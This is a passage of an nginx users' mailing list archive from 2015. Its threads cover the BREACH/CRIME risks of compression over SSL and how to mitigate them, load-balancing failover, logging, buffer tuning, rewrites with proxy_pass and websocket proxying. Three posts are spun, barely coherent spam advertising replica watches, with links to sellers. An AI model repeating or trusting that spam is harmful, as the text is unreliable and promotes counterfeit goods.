the admin to enable server-side http-compression because we > tend to have rather lengthy json responses from our REST api and they > compress very well and the performance gain would be significant. He > decline doing that, explaining that because of the CRIME vulnerability, it > is not a good idea to enable compression when using ssl with nginx. Is this > really always the case? Are there scenarios where the vulnerability is not > a problem? I am trying to understand this better to make an informed > decision because not using compression (encryption is a must) would incur > other costs (optimizations in the code) and I don't just want to waste that > time and money unless I have to. The CRIME attack only applies when you are using SSL compression, which is always off in nginx. There is a similar attack on gzip http compression, BREACH. It only applies if you return sensitive data in a response with some user-controlled data, and compress them together. Such attacks usually can be more or less easily mitigated by either not compressing sensitive responses (nginx allows to control gzip compression on a per-location basis) or implementing some rate limits (like limit_req). See here for more details: https://en.wikipedia.org/wiki/BREACH_(security_exploit) -- Maxim Dounin http://nginx.org/ From reallfqq-nginx at yahoo.fr Mon Jul 27 17:35:11 2015 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Mon, 27 Jul 2015 19:35:11 +0200 Subject: Is SSL and Compression never secure in nginx? In-Reply-To: References: Message-ID: CRIME has been superseeded by BREACH, and it is in no way related to any specific Web server, but to the more general concepts of TLS-encrypted (gzip-?)compressed HTTP content (SPDY is fine). On the following website you will get all the details as well as a cheat-sheet list of ideas to mitigate it. Disabling gzip compression when encrypting HTTP content is one idea. http://breachattack.com/ ?The baseline is: nginx in itself has nothing to do with it.? --- *B. R.* On Mon, Jul 27, 2015 at 5:24 PM, Robert Kr?ger wrote: > > Hi, > > I am working in a project where a password-protected extranet application > is behind an nginx proxy using ssl. > > Now I asked the admin to enable server-side http-compression because we > tend to have rather lengthy json responses from our REST api and they > compress very well and the performance gain would be significant. He > decline doing that, explaining that because of the CRIME vulnerability, it > is not a good idea to enable compression when using ssl with nginx. Is this > really always the case? Are there scenarios where the vulnerability is not > a problem? I am trying to understand this better to make an informed > decision because not using compression (encryption is a must) would incur > other costs (optimizations in the code) and I don't just want to waste that > time and money unless I have to. > > Thanks in advance, > > Robert > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From vl at nginx.com Mon Jul 27 18:04:18 2015 From: vl at nginx.com (Vladimir Homutov) Date: Mon, 27 Jul 2015 21:04:18 +0300 Subject: Nginx response with persistence session and backend server failure In-Reply-To: References: Message-ID: <20150727180417.GB32277@gbox.status.megafon.ru> On Mon, Jul 27, 2015 at 12:40:04PM +0530, Bhuvan Gupta wrote: > Hello all, > > I was reading Nginx documentation > > on > persistence session using cookie and below is from documentation > > A request that comes from a client not yet bound to a particular server is > passed to the server selected by the configured balancing method. Further > requests with this cookie will be passed to the designated server. *If the > designated server cannot process a request*, *the new server is selected as > if the client has not been bound yet*. > > The last line says that > > *If the designated server cannot process a request*. > > What does it mean to say "the server cannot process a request." it means: - nginx either failed to contact upstream server and get response from it (within configured timeouts - see proxy_*_timeout directives), or some limit was hit (i.e. max_conns) - either the response was obtained, but considered inadequate and nginx decided not to deliver the answer to client and instead try other server (or return an error immediately - see nginx.org/r/proxy_next_upstream) > > Question 1: > Does it mean the server was down ? > or does it mean server responded with some error code ? > or does it mean that it did not responded in a certain time interval ? > or does it mean that max number of connection limit is reached on that > server ? in short: this is configurable, see above. > > Question 2: > Let say there were 3 backend-server and we are using session persistence > using cookie. > Now assume that 2 of the backed server goes down so niginx will route all > request to 3rd server > Now 2 other server came back online, will niginx use the other 2 server to > route the request even if request have the persistence cookie for 3rd > server. obviously, not. If a request has a cookie for 3rd server and it is available, it will be routed to a 3rd server. Requests without cookies will be routed to servers according load balancing methods. From tfransosi at gmail.com Mon Jul 27 19:28:25 2015 From: tfransosi at gmail.com (Thiago Farina) Date: Mon, 27 Jul 2015 16:28:25 -0300 Subject: upstart conf for managing nginx In-Reply-To: <20150725070023.GY23844@daoine.org> References: <20150725070023.GY23844@daoine.org> Message-ID: Besides everything Francis said, there is also a typo in the 'expect' line. s/deamon/daemon -- Thiago Farina From tfransosi at gmail.com Mon Jul 27 19:30:35 2015 From: tfransosi at gmail.com (Thiago Farina) Date: Mon, 27 Jul 2015 16:30:35 -0300 Subject: How to run nginx unit tests? In-Reply-To: <13e58dd89ea7af362132361ed037ebed.NginxMailingListEnglish@forum.nginx.org> References: <20150722175530.GB1500@mdounin.ru> <13e58dd89ea7af362132361ed037ebed.NginxMailingListEnglish@forum.nginx.org> Message-ID: On Wed, Jul 22, 2015 at 3:53 PM, rms wrote: > Thanks Maxim. So from end user's perspective is there something I can do to > test the validity of build/install? > Not sure what kind of confirmation you want, but you can try starting the service perphaps? Does that work? You can also test the config with: $ sudo nginx -t Hope that helps, Regards, -- Thiago Farina From krueger at lesspain.de Tue Jul 28 08:13:37 2015 From: krueger at lesspain.de (=?UTF-8?Q?Robert_Kr=C3=BCger?=) Date: Tue, 28 Jul 2015 10:13:37 +0200 Subject: Is SSL and Compression never secure in nginx? In-Reply-To: References: Message-ID: OK, thanks a lot for the feedback. That helped. I will try to find out if one of the "fixes" applies to our case. On Mon, Jul 27, 2015 at 7:35 PM, B.R. wrote: > CRIME has been superseeded by BREACH, and it is in no way related to any > specific Web server, but to the more general concepts of TLS-encrypted > (gzip-?)compressed HTTP content (SPDY is fine). > > On the following website you will get all the details as well as a > cheat-sheet list of ideas to mitigate it. Disabling gzip compression when > encrypting HTTP content is one idea. > http://breachattack.com/ > > ?The baseline is: nginx in itself has nothing to do with it.? > --- > *B. R.* > > On Mon, Jul 27, 2015 at 5:24 PM, Robert Kr?ger > wrote: > >> >> Hi, >> >> I am working in a project where a password-protected extranet application >> is behind an nginx proxy using ssl. >> >> Now I asked the admin to enable server-side http-compression because we >> tend to have rather lengthy json responses from our REST api and they >> compress very well and the performance gain would be significant. He >> decline doing that, explaining that because of the CRIME vulnerability, it >> is not a good idea to enable compression when using ssl with nginx. Is this >> really always the case? Are there scenarios where the vulnerability is not >> a problem? I am trying to understand this better to make an informed >> decision because not using compression (encryption is a must) would incur >> other costs (optimizations in the code) and I don't just want to waste that >> time and money unless I have to. >> >> Thanks in advance, >> >> Robert >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Tue Jul 28 12:42:42 2015 From: nginx-forum at nginx.us (Jugurtha) Date: Tue, 28 Jul 2015 08:42:42 -0400 Subject: GeoIP data in access_log Nginx In-Reply-To: <20150727170144.GJ19190@mdounin.ru> References: <20150727170144.GJ19190@mdounin.ru> Message-ID: Hello Maxim, Thanks for the reply, you are the best ;) I would like to add the GeoIP data into my log access to facilitate processing in Kibana (ELK stack) Maybe is not the good way because i know it possible to do this with LogStash (GeoIP Filter), and this would reduce pressure Nginx (what do you think ?) #Conf GEOIP (Load GeoIP Lib) => Downloaded on maxmind website geoip_country /var/lib/GeoIP/GeoIP.dat; geoip_city /var/lib/GeoIP/GeoLiteCity.dat; #My log format log_format main '$host $remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for" "$request_time" "$upstream_cache_status" "$gzip_ratio" "$geoip_country_code"'; => it works well with "$geoip_country_code" my.domain.fr xxx.xxx.xxx.xxx - - [28/Jul/2015:14:29:38 +0200] "GET /test.jpg HTTP/1.0" 200 270225 "-" "Wget/1.12 (linux-gnu)" "-" "0.048" "MISS" "-" "FR" Merci, thanks again. Best regards, Jugurtha Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260566,260586#msg-260586 From nginx-forum at nginx.us Tue Jul 28 19:15:32 2015 From: nginx-forum at nginx.us (cskalyan) Date: Tue, 28 Jul 2015 15:15:32 -0400 Subject: log files as non root user Message-ID: <75686701f8efe8909a567b3fec836d3e.NginxMailingListEnglish@forum.nginx.org> Hello Everyone, I am trying to configure ngnix where logs and pid file are written to a custom path and owned as non root. When even I start ngnix these files are created and owned as root. In ngnix.conf I defined as below. Please advise. user usradmin mwgroup; worker_processes 1; error_log /export/local/opt/ngnix/logs/error.log warn; pid /export/local/opt/ngnix/logs/nginx.pid; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; log_format main '$remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"'; access_log /export/local/opt/ngnix/logs/access.log main; sendfile on; #tcp_nopush on; keepalive_timeout 65; #gzip on; include /etc/nginx/conf.d/*.conf; } Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260593,260593#msg-260593 From francis at daoine.org Tue Jul 28 22:45:33 2015 From: francis at daoine.org (Francis Daly) Date: Tue, 28 Jul 2015 23:45:33 +0100 Subject: Using dynamic access_log, automatically create parent directory In-Reply-To: References: Message-ID: <20150728224533.GZ23844@daoine.org> On Sun, Jul 26, 2015 at 10:49:01PM -0400, justink101 wrote: Hi there, > We use a dynamic value for access logs: > > access_log /var/log/nginx/domains/$host/access.log main; > > However, if the $host directory does not exist in /var/log/nginx/domains > nginx fails with an error creating the access log. Is there a way to have > nginx create the $host directory automatically instead of failing? Not in stock nginx. You could create a patch to do it; but I suspect that the overhead of an extra "mkdir -p"-like call for every log line written would not be worth it. If you are willing to rearrange your log file structure such that the variable part is in the filename, and not a parent directory name, then stock nginx can help you. > Seems like this should be default behavior? I think "no". But it's the person who writes the code who has the opinion that matters; at least for their local version of nginx. f -- Francis Daly francis at daoine.org From lists at ruby-forum.com Wed Jul 29 05:44:05 2015 From: lists at ruby-forum.com (Mikutems Bolly) Date: Wed, 29 Jul 2015 07:44:05 +0200 Subject: Nginx 1.8 proxying to Netty - timeout from upstream In-Reply-To: <10b1f2df3096cd9c325ed42a0b3b9d38.NginxMailingListEnglish@forum.nginx.org> References: <10b1f2df3096cd9c325ed42a0b3b9d38.NginxMailingListEnglish@forum.nginx.org> Message-ID: Barely any about this can be to express that the follow is definitely just about anything a lot less than an awesome timepiece, because quite possibly her occasional detractors would take into consideration. It has got really become a tid bit a good deal, in addition to there has been a freshly released meow to get a thing a little less ostentatious. In spite of the sustained attraction associated with bigger sports looks after inside the person economy, there is certainly a powerful impending as well as popular improve at the nearby horizon. Producers will be slowly but surely sizes straight down ones own libraries inside preparing for those so next large factor - which usually in such cases, will probably be smaller wristwatches (fairly chatting they can never become small and you will probably never observe activity different watches beneath 39mm). Those reduced watches would be a awesome start just for designer, since they will obviously get more a wholly latest set in clients who have been can not display the larger choices pertaining to wearability motives, whilst in addition returning whole circular image to the die-hard devotees in whose is more enjoyable really are ageing past the tremendous in addition to blingy and possess been recently weeping out and about for one thing slighter and even sustainably wearable. There exists minor hesitation that it assortment can enlarge dramatically following the basic establish subsequently the spring and coil, however primary parts available for purchase will likely be those people pictured right here. For people who delight in the style together with produce within the collection nonetheless contain stood aside meant for motives regarding snapshot or even size, now is the time for you to reassess. The sit back and watch normally takes many photographs as a result we understand most of the conflicts as well as secrets-and-cheats that positives take advantage of whenever they contain a lot of programs at its disposable. One thing will possibly not know is usually that a lot of some time wristwatches transport to seasoned photography enthusiasts do not even have an important crystal installed. The following is an intriguing video clip that will shows a moment lapse procedure of a wrist watch snapshot staying altered inside the exquisite form of image thousands upon untold numbers of folks will find and additionally respect. In spite, the enjoy sure me personally which usually that is a revolutionary gallery which will see is answerable to, along with quick grown timbers. intricate action together with attractive business presentation, this kind of wristwatch is not actually that super star belonging to the variety nevertheless this really is equally a story designed for an additional report breitling replica watches. Me not need which usually to earn this unique part certainly not tone essential, for the reason that often it is the most crucial unique sit back and watch contains unveiled. It is not necessarily exclusively highly attractive, nevertheless a symbol with when this make is headed during the future three years or so a new subtle start looking this renovations in overall truly feel about looks after with an focus on extra obtainable haute horology. Put simply this can be a look into what precisely components to feature into a observe for you to connect the item through which consists of history to be a penning tool company. The particular watch is definitely the designate belonging to the brand well-known as well as hereditary group. This has been utilized by wristwatches previous to, though the variety is usually a new class of wristwatches by having a seem of which. Good a fabulous glance that will really seems as being similar to a watch. Now absolutely nothing by any means erroneous start, along with it is sensible specified story. Furthermore, it mean that in a sense that is certainly her eye sight meant for more than many the things that designer watches should provide you with as a minimum in the mid-range. A complex thing is actually which will designer watches yet offers the two entry-level and also high-end products the ones range. Some timepiece for instance vogue offered its template as well as movement creates the latest category pertaining to alone inside the label. -- Posted via http://www.ruby-forum.com/. From lists at ruby-forum.com Wed Jul 29 05:44:49 2015 From: lists at ruby-forum.com (Mikutems Bolly) Date: Wed, 29 Jul 2015 07:44:49 +0200 Subject: do not fail when ssl cert not present. In-Reply-To: References: Message-ID: <2800c90ac9d899d8f6d01f4da1cc2be0@ruby-forum.com> By means of many follow organisations heading to make sure you in-house created routines, could there be any sort of issue that this change can make the software tougher to your timepieces to generally be maintained 20-50 years of age right from nowadays? Might foreign exchange trading modification cause it to more challenging to discover the view serviced, both regionally or even with the look at firm on their own? Small designs ordinarily are not certain to make sure you occur and additionally when some thing has gone incorrect, it is not crystal clear whether sections will likely be obtainable. Likewise, actually large brands in most cases certainly not service old designer watches. Some might, but it is not necessarily surefire. Almost everything can be predetermined or perhaps maintained, however, the key fewer common plus earlier a wristwatch is certainly, slightly more very difficult it can be to search out a person who is going to work with it, along with the more pricey it might obtain. http://www.waxwatchreplicas.co.uk http://www.waxwatchreplicas.co.uk/replica-tag-heuer-watches-sale-for-uk.html http://www.waxwatchreplicas.co.uk/replica-omega-watches-sale-for-uk.html -- Posted via http://www.ruby-forum.com/. From nginx-forum at nginx.us Wed Jul 29 11:14:21 2015 From: nginx-forum at nginx.us (tunist) Date: Wed, 29 Jul 2015 07:14:21 -0400 Subject: mp4 streaming/seeking works from firefox (fedora) and not from firefox (windows) (nginx 1.9.3) Message-ID: <3e13103f2fbe0508b4c57caebad87e19.NginxMailingListEnglish@forum.nginx.org> greetings! i am seeing an unexplained malfunction here with nginx when serving videos. flv and mp4 files have different symptoms. mp4 streams correctly when i view the file in firefox 39 in fedora 22, but in windows 7 (firefox 39) the file cannot be 'seeked' and must be played linearly. after speaking with the coders of video.js (the player i use), it was determined that nginx is not returning byte range data appropriately (or at all) - so seeking would not work. however, this does not explain why firefox 39 in fedora works perfectly and does not provide a solution as to how to get nginx to serve correctly. the only advice i have seen is to change the value of the 'max_ranges' directive - but doing that has made no difference. i have left it as 'unset' - which i understand to mean 'unlimited'. an example video from the server is here: src="https://www.ureka.org/file/play/17924/censored%20on%20google%202.mp4" any tips welcomed! thanks Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260615,260615#msg-260615 From nginx-forum at nginx.us Wed Jul 29 13:42:47 2015 From: nginx-forum at nginx.us (evgeni22) Date: Wed, 29 Jul 2015 09:42:47 -0400 Subject: problem with images after refresh website Message-ID: <781fc3edb66a81d0d068982d4d021348.NginxMailingListEnglish@forum.nginx.org> Hi i run directadmin+nginx1.8+php5.4 php-fpm when i do refresh to website the images not refresh good, sometime after refresh it put images in wrong place or double the images you can look on this website rhost(dot)biz, you can try refresh few times and look on the images and you will see the problem. what can be the problem? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260621,260621#msg-260621 From nginx-forum at nginx.us Wed Jul 29 13:53:22 2015 From: nginx-forum at nginx.us (Jugurtha) Date: Wed, 29 Jul 2015 09:53:22 -0400 Subject: log files as non root user In-Reply-To: <75686701f8efe8909a567b3fec836d3e.NginxMailingListEnglish@forum.nginx.org> References: <75686701f8efe8909a567b3fec836d3e.NginxMailingListEnglish@forum.nginx.org> Message-ID: <9a4b2e24c3449c7f73115408e50afefb.NginxMailingListEnglish@forum.nginx.org> Hello, If you start your nginx process with root (login), your master process will start with root but the "worker process" and "cache manager" with usradmin:mwgroup (you can test with this command "ps aux | grep nginx") you can try to start nginx with usradmin account : "su - usradmin ; /etc/init.d/nginx start", this will solve the rights issue Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260593,260622#msg-260622 From t.glaser at tarent.de Wed Jul 29 15:00:40 2015 From: t.glaser at tarent.de (Thorsten Glaser) Date: Wed, 29 Jul 2015 17:00:40 +0200 (CEST) Subject: 403 errors with standard browser, pages work with GUI browser Message-ID: Hi, I?ve run across several websites where I get a 403 error when I connect to them with my standard webbrowser (lynx), yet the very same URIs work with the GUI browser fallback (Firef*x). Example link: http://blog.streamingmedia.com/2015/07/new-patent-pool-wants-share-of-revenue-from-content-owners.html Output from webbrowser: ??? 403 Forbidden 403 Forbidden ______________________________________________________________________________________________ nginx All of these sites is common that they have an nginx error message, so this must be connected to your software somehow. To add insult to injury, this appears to be dependent on the User-Agent HTTP header: ?Mozilla/5.0 (compatible)? works, ?Lynx/2.8.9dev.6? works, ?Lynx/2.8.9dev.6 libwww-FM/2.14? doesn?t, nor ?Mozilla/5.0 (compatible) libwww-FM/2.14?. It appears that there is some blacklist on some component of my webbrowser. Please kindly remove it. Thanks, //mirabilos -- >> Why don't you use JavaScript? I also don't like enabling JavaScript in > Because I use lynx as browser. +1 -- Octavio Alvarez, me and ????? (Mario Lang) on debian-devel From francis at daoine.org Wed Jul 29 15:23:08 2015 From: francis at daoine.org (Francis Daly) Date: Wed, 29 Jul 2015 16:23:08 +0100 Subject: 403 errors with standard browser, pages work with GUI browser In-Reply-To: References: Message-ID: <20150729152308.GA23844@daoine.org> On Wed, Jul 29, 2015 at 05:00:40PM +0200, Thorsten Glaser wrote: Hi there, > I?ve run across several websites where I get a 403 error when > I connect to them with my standard webbrowser (lynx), yet the > very same URIs work with the GUI browser fallback (Firef*x). > All of these sites is common that they have an nginx error > message, so this must be connected to your software somehow. That suggests that they run nginx as their web server. There is unlikely to be any other connection. > To add insult to injury, this appears to be dependent on > the User-Agent HTTP header: ?Mozilla/5.0 (compatible)? > works, ?Lynx/2.8.9dev.6? works, ?Lynx/2.8.9dev.6 libwww-FM/2.14? > doesn?t, nor ?Mozilla/5.0 (compatible) libwww-FM/2.14?. > > It appears that there is some blacklist on some component > of my webbrowser. Please kindly remove it. I suspect that they have configured their instance of their web server to deny access to user agents which include the string "libwww". I suspect that your best option for accessing the content is to change your web browser user agent string to omit "libwww" (and whatever other parts the server owner has chosen to block); at least until you contact the owner and convince them to change their configuration. Good luck with it, f -- Francis Daly francis at daoine.org From vikrant.thakur at gmail.com Wed Jul 29 16:37:00 2015 From: vikrant.thakur at gmail.com (vikrant singh) Date: Wed, 29 Jul 2015 09:37:00 -0700 Subject: upstart conf for managing nginx In-Reply-To: <20150725070023.GY23844@daoine.org> References: <20150725070023.GY23844@daoine.org> Message-ID: Thanks for your reply.. and pointing out the typo. nginx doesnt comes up, and upstart command hangs, I have to kill it to come out of it. Changing path did not helped and neither does expect fork (but I do agree I need fork and not daemon) . It turned out that I named my conf file as "nginx.conf", and it was causing the problem. I guess because it is also trying to start a binary with same name (but not sure). Changing the name of config file fixed the issue.. and I am able to use upstart conf to manage nginx. On Sat, Jul 25, 2015 at 12:00 AM, Francis Daly wrote: > On Fri, Jul 24, 2015 at 04:09:02PM -0700, vikrant singh wrote: > > Hi there, > > > I wrote a small upstart script to stop/start nginx through upstart. This > is > > how it looks > > I do not have an upstart system to test on, but: > > * comparing with http://wiki.nginx.org/Upstart, you have "expect daemon" > and that has "expect fork". > > * the binary you run is /usr/local/nginx/nginx; I think it is more common > for it to be /usr/local/nginx/sbin/nginx. > > Does checking and changing either of those make a difference? > > Does "hangs" mean "things run fine eventually, but there is a delay"; > or "things never run correctly"? > > (Is there anything in the nginx or upstart logs which might indicate > the problem?) > > f > -- > Francis Daly francis at daoine.org > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Wed Jul 29 18:55:54 2015 From: nginx-forum at nginx.us (doolli_doug) Date: Wed, 29 Jul 2015 14:55:54 -0400 Subject: Default access_log buffering Message-ID: <69d6fb553f3c8eb7d54cf642901b4bd9.NginxMailingListEnglish@forum.nginx.org> I was reading an article on performance on the Nginx site: https://www.nginx.com/blog/tuning-nginx/ One thing mentioned was enabling buffering on the access_log. However, the directive reference (http://nginx.org/en/docs/http/ngx_http_log_module.html#access_log) says that the default buffer size is 64 KB. Does this mean that buffering is enabled by default, with a size of 64 KB, or that if the buffer is enabled without a specified size, it will be 64 KB? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260630,260630#msg-260630 From mdounin at mdounin.ru Wed Jul 29 19:58:22 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 29 Jul 2015 22:58:22 +0300 Subject: Default access_log buffering In-Reply-To: <69d6fb553f3c8eb7d54cf642901b4bd9.NginxMailingListEnglish@forum.nginx.org> References: <69d6fb553f3c8eb7d54cf642901b4bd9.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150729195822.GT19190@mdounin.ru> Hello! On Wed, Jul 29, 2015 at 02:55:54PM -0400, doolli_doug wrote: > I was reading an article on performance on the Nginx site: > https://www.nginx.com/blog/tuning-nginx/ One thing mentioned was enabling > buffering on the access_log. > > However, the directive reference > (http://nginx.org/en/docs/http/ngx_http_log_module.html#access_log) says > that the default buffer size is 64 KB. Does this mean that buffering is > enabled by default, with a size of 64 KB, or that if the buffer is enabled > without a specified size, it will be 64 KB? The default buffer size the documentation talks about is one used if you enable the "gzip" parameter, but don't specify buffer size explicitly. -- Maxim Dounin http://nginx.org/ From karljohnson.it at gmail.com Wed Jul 29 20:45:31 2015 From: karljohnson.it at gmail.com (Karl Johnson) Date: Wed, 29 Jul 2015 16:45:31 -0400 Subject: Tweak fastcgi_buffer In-Reply-To: <20150723192124.GB19190@mdounin.ru> References: <20150723192124.GB19190@mdounin.ru> Message-ID: On Thu, Jul 23, 2015 at 3:21 PM, Maxim Dounin wrote: > Hello! > > On Wed, Jul 22, 2015 at 05:50:12PM -0400, Karl Johnson wrote: > > > Hello, > > > > I need to tweak fastcgi_buffer to 1m on a website that has heavy requests > > to avoid buffer. If I use a distro with 4096 pagesize, is it better to do > > 256x 4k or 4x 256k? > > > > [root at web ~]# getconf PAGESIZE > > 4096 > > [root at web ~]# > > > > fastcgi_buffer_size 4k; > > fastcgi_buffers 256 4k; > > > > OR > > > > fastcgi_buffer_size 256k; > > fastcgi_buffers 4 256k; > > I would recommend the latter. Or, alternatively, something like > > fastcgi_buffers 8 128k; > > Too many small buffers will result in extra processing overhead, > and it's unlikely to be a good solution. > Thanks for the recommendation Maxim. There's no issue setting the buffer to 128k when the pagesize is 4k? Karl -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Wed Jul 29 21:59:01 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 30 Jul 2015 00:59:01 +0300 Subject: Tweak fastcgi_buffer In-Reply-To: References: <20150723192124.GB19190@mdounin.ru> Message-ID: <20150729215901.GW19190@mdounin.ru> Hello! On Wed, Jul 29, 2015 at 04:45:31PM -0400, Karl Johnson wrote: > On Thu, Jul 23, 2015 at 3:21 PM, Maxim Dounin wrote: > > > Hello! > > > > On Wed, Jul 22, 2015 at 05:50:12PM -0400, Karl Johnson wrote: > > > > > Hello, > > > > > > I need to tweak fastcgi_buffer to 1m on a website that has heavy requests > > > to avoid buffer. If I use a distro with 4096 pagesize, is it better to do > > > 256x 4k or 4x 256k? > > > > > > [root at web ~]# getconf PAGESIZE > > > 4096 > > > [root at web ~]# > > > > > > fastcgi_buffer_size 4k; > > > fastcgi_buffers 256 4k; > > > > > > OR > > > > > > fastcgi_buffer_size 256k; > > > fastcgi_buffers 4 256k; > > > > I would recommend the latter. Or, alternatively, something like > > > > fastcgi_buffers 8 128k; > > > > Too many small buffers will result in extra processing overhead, > > and it's unlikely to be a good solution. > > > > Thanks for the recommendation Maxim. There's no issue setting the buffer to > 128k when the pagesize is 4k? No issues, though large buffers imply some memory waste when last buffer isn't fully used. So usually you should consider some balance between number of buffers and their size. -- Maxim Dounin http://nginx.org/ From lists at ruby-forum.com Thu Jul 30 03:31:45 2015 From: lists at ruby-forum.com (Mikutems Bolly) Date: Thu, 30 Jul 2015 05:31:45 +0200 Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time In-Reply-To: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org> References: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org> Message-ID: <6c3025340cf3840fa333826a1a85ee95@ruby-forum.com> Zero about this is always to assert that your sit back and watch will be things below a great timepiece, simply because possibly their unexpected detractors could recognise. It has got just simply be a little bit very much, and additionally there have been a newly released yowl with regard to a specific thing a bit less ostentatious http://www.refinedwatch.com. Do not mind the occasional went on global recognition involving greater sporting watches with the client sector, there does exist the imminent not to mention popular modification over the close horizon. -- Posted via http://www.ruby-forum.com/. From nginx-forum at nginx.us Thu Jul 30 07:57:41 2015 From: nginx-forum at nginx.us (evgeni22) Date: Thu, 30 Jul 2015 03:57:41 -0400 Subject: problem with images after refresh website In-Reply-To: <781fc3edb66a81d0d068982d4d021348.NginxMailingListEnglish@forum.nginx.org> References: <781fc3edb66a81d0d068982d4d021348.NginxMailingListEnglish@forum.nginx.org> Message-ID: <27b17494cd9149396faf0ff128c3e203.NginxMailingListEnglish@forum.nginx.org> fixed was problem with timeout timeout 2 increase it to timeout 10 Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260621,260643#msg-260643 From nginx-forum at nginx.us Thu Jul 30 08:07:05 2015 From: nginx-forum at nginx.us (evgeni22) Date: Thu, 30 Jul 2015 04:07:05 -0400 Subject: does it normal? Message-ID: <7252849dbd532e9f9807ee605e23e563.NginxMailingListEnglish@forum.nginx.org> my server info: Processor Intel Xeon E3 1225v2 RAM 32GB DDR3 Disks 3 x 120 GB SSD i run directadmin+nginx the nginx use 14gb of 32gb and this output from server: root 12872 0.0 38.8 12868180 12748776 ? Ss 09:35 0:00 nginx: master process /usr/sbin/nginx -c /etc/nginx/nginx.conf nginx 12873 0.0 38.8 12889524 12759540 ? S 09:35 0:00 nginx: worker process nginx 12882 0.0 38.8 12876504 12756964 ? S 09:35 0:00 nginx: worker process nginx 12883 0.0 38.8 12879652 12757656 ? S 09:35 0:00 nginx: worker process nginx 12884 0.0 38.8 12872432 12753532 ? S 09:35 0:00 nginx: worker process when i do restart to nginx service it take 2min 40second to restart. after restart it immediately use 14gb of ram does it normal for nginx? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260644,260644#msg-260644 From pablo at pablo.com.mx Thu Jul 30 08:28:47 2015 From: pablo at pablo.com.mx (Pablo Fischer) Date: Thu, 30 Jul 2015 01:28:47 -0700 Subject: Memory zone usage Message-ID: Howdy! Was wondering if there's a way to know the memory usage that a zone (like limit_req) is having? Reason I ask is because I think I'm the value I've today might me a bit high but before I change it I would like to check during the day what is its current usage. Thanks! -- Pablo From maxim at nginx.com Thu Jul 30 10:34:04 2015 From: maxim at nginx.com (Maxim Konovalov) Date: Thu, 30 Jul 2015 13:34:04 +0300 Subject: blog post: new debugging features in nginx Message-ID: <55B9FD9C.1050203@nginx.com> Hello, Andrew Hutchings wrote a blog post about new debugging features you can find in nginx 1.9.2 and later: https://www.nginx.com/blog/new-debugging-features-probe-nginx-internals/ -- Maxim Konovalov http://nginx.com From edigarov at qarea.com Thu Jul 30 14:57:49 2015 From: edigarov at qarea.com (Gregory Edigarov) Date: Thu, 30 Jul 2015 17:57:49 +0300 Subject: tell nginx to stay inside same location? Message-ID: <55BA3B6D.8080404@qarea.com> Hello, is that possible to tell nginx to stay inside the same location after rewrite rule is done? i.e. I have: location /njs/ { proxy_pass http://localhost:5501; ...... } now, if i need to cut off /njs/ part, i added the following: location /njs/ { rewrite /njs(.*) $1; proxy_pass http://localhost:5501; .......... } but, that doesn't work, because my uri has changed and nginx goes to the default location, which I don't need. what could I do in this situation? -- With best regards, Gregory Edigarov From me at myconan.net Thu Jul 30 15:02:16 2015 From: me at myconan.net (Edho Arief) Date: Fri, 31 Jul 2015 00:02:16 +0900 Subject: tell nginx to stay inside same location? In-Reply-To: <55BA3B6D.8080404@qarea.com> References: <55BA3B6D.8080404@qarea.com> Message-ID: On Thu, Jul 30, 2015 at 11:57 PM, Gregory Edigarov wrote: > Hello, > > is that possible to tell nginx to stay inside the same location after > rewrite rule is done? > > i.e. I have: > > location /njs/ { > proxy_pass http://localhost:5501; > ...... > } > > now, if i need to cut off /njs/ part, i added the following: > location /njs/ { > rewrite /njs(.*) $1; > proxy_pass http://localhost:5501; > .......... > } > > but, that doesn't work, because my uri has changed and nginx goes to the > default location, which I don't need. > > what could I do in this situation? > if only you have read the documentation... http://nginx.org/r/proxy_pass ... When the URI is changed inside a proxied location using the rewrite directive, and this same configuration will be used to process a request (break): location /name/ { rewrite /name/([^/]+) /users?name=$1 break; proxy_pass http://127.0.0.1; } In this case, the URI specified in the directive is ignored and the full changed request URI is passed to the server. ... From nginx-forum at nginx.us Thu Jul 30 15:19:32 2015 From: nginx-forum at nginx.us (nightcrawler) Date: Thu, 30 Jul 2015 11:19:32 -0400 Subject: Websocket handshake failing Message-ID: <879cb06ad3573d1c1bd1e2353d6e34fe.NginxMailingListEnglish@forum.nginx.org> I'm trying to enable websocket communication between client and server and have nginx as proxy. Ive applied the following congiguration changes to websocket sites-enabled conf to allow for websocket proxy: proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection "upgrade"; proxy_set_header X-Forwarded-For $http_x_forwarded_for; proxy_set_header Host $http_host; proxy_pass http://mywebsite; Although the server receives the Connection: Upgrade header and responds with aConnection: Upgrade header as expected, the client gets only Connection: keep-alive and I see the following error on js-console WebSocket connection to 'wss://mywebsite.dev/cometd/' failed: Error during WebSocket handshake: 'Connection' header value must contain 'Upgrade' I 